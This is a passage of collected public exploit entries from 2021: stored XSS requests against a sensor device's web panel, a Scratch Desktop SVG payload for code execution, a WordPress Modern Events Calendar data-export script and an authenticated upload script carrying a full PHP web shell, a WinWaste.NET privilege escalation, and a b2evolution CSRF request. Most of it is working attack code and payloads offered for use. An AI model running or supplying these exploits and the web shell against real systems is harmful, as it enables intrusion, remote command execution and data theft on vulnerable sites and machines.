User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
Example of regular cross-site scripting (XSS):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>
The example above launches cmd.exe (Command Prompt) on Windows.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24146
# CWE: CWE-863, CWE-284
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md
'''
Description:
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
versions before 5.16.5, did not properly restrict access to the export files,
allowing unauthenticated users to exports all events data in CSV or XML format for example.
'''
'''
Banner:
'''
banner = """
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/
* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
import csv
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
'''
Exploit:
'''
print('')
print('[+] Exported Data: ')
print('')
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
answer = requests.get(exploit_url)
decoded_content = answer.content.decode('utf-8')
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
my_list = list(cr)
for row in my_list:
print(row)
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
# Date: 2021-07-01
# Author: Andrea Intilangelo
# Vendor Homepage: http://nica.it - http://winwastenet.com
# Version: 1.0.6183.16475
# Tested on: Windows 10 Pro x64 - 20H2 and 21H1
# CVE: CVE-2021-34110
WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.
(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software.
(3) Details:
C:\Users\user>sc qc winwasteservice
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: winwasteservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : WinwasteService
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG"
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\"
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24145
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md
'''
Description:
Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5,
did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv'
content-type in the request.
'''
'''
Banner:
'''
banner = """
______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/
* Wordpress Plugin Modern Events Calendar Lite RCE
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()
'''
Exploit:
'''
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import"
# Exploit Header:
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589",
"Origin": "http://" + target_ip,
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell
body = "-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"feed\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"mec-ix-action\"\r\n\r\nimport-start-bookings\r\n-----------------------------29650037893637916779865254589--\r\n"
# Exploit
session.post(exploit_url, headers=header, data=body)
print('')
print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')
print('')
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel (@alpernae)
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Version : 7.2.2
# Tested on: Kali Linux
# Category: WebApp
######## Description ########
Allows to attacker change admin account details.
######## Proof of Concept ########
===> REQUEST <====
POST /b2evolution/evoadm.php HTTP/1.1
Host: s2.demo.opensourcecms.com
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1031
Origin: https://s2.demo.opensourcecms.com
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
## < SNIPP >
edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
